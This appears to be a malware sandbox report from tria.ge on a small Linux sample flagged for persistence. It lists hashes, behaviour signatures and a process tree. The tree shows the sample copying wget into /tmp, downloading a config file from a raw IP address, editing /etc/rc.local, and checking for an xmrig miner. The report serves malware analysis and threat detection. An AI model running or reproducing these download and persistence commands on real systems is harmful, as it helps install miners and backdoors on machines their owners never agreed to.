Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

ea79e6f3a9...kes118

ubuntu-18.04-amd64

7

ea79e6f3a9...kes118

debian-9-armhf

7

ea79e6f3a9...kes118

debian-9-mips

7

ea79e6f3a9...kes118

debian-9-mipsel

7

Analysis

  • max time kernel
    132s
  • max time network
    151s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    09/04/2024, 17:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118

  • Size

    2KB

  • MD5

    ea79e6f3a96671aa051f677679c2bda0

  • SHA1

    2e2f085e81e8e750da43d8217541404ab78461e9

  • SHA256

    f60d0a378a482bde674b1e5d610bd8d3926468f59ced75e4d29776d14fa4c543

  • SHA512

    ce1a0f0c3c233a3bfa2724961e9f0f4ae2b061a60560ec37f0acfabad931c6a5a13ae2477d363e855f586fb5e097d5a33c464e57fb8ab06641ac67afcff58fce

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

    persistence
  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    1⤵
    • Modifies rc script
    PID:1559
    • /bin/cp
      cp /usr/bin/wget .
      2⤵
      • Writes file to tmp directory
      PID:1569
    • /bin/chmod
      chmod +x wget
      2⤵
        PID:1570
      • /tmp/wget
        ./wget -P /tmp/ http://103.45.185.68:6358/config.json
        2⤵
        • Executes dropped EXE
        PID:1571
    • /bin/grep
      grep -v grep
      1⤵
        PID:1563
      • /bin/grep
        grep /etc/mlwk.sh
        1⤵
          PID:1562
        • /bin/cat
          cat /etc/rc.local
          1⤵
            PID:1561
          • /usr/bin/wc
            wc -l
            1⤵
              PID:1568
            • /bin/grep
              grep -v grep
              1⤵
                PID:1567
              • /bin/grep
                grep /tmp/xmrig
                1⤵
                  PID:1566
                • /bin/ps
                  ps aux
                  1⤵
                  • Reads CPU attributes
                  • Reads runtime system information
                  PID:1565

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /etc/rc.local
                  Filesize

                  18B

                  MD5

                  2e5bcdd3b23224ecae22093a9349b20a

                  SHA1

                  b4a63c6da233638e105eb63db7c2bf6dcf9b11c3

                  SHA256

                  4157be04ebab2c4aa0df84f890df6062723225e8dc19cabc475f4febc5c8a77d

                  SHA512

                  c40cd9dad61486ab872ed7d05bbdfd7ac55d22c8b12e113aa84b9ee664d5744c40807d9b7bd7390e4c570874418bdcc14695017fbffb5dabeaf58dd60ce66af7

                  Download Submit

                • /tmp/wget
                  Filesize

                  487KB

                  MD5

                  c3d53e47e50f2f61016331da435b3764

                  SHA1

                  96b8ea5f95dcce5781a673bc9effe1bdb8e1756d

                  SHA256

                  0f2b21e911bd10d795a110af7901d7860228f63cf14594ecbfb397e66000b4ae

                  SHA512

                  790cf336231b7c7bb24037f62326643df1c030314085957d8bc06a4217395b49f49e50f9a503652ad2650f2cab642bd98bd34fd4df4ab8f02becaf262d2c148a

                  Download Submit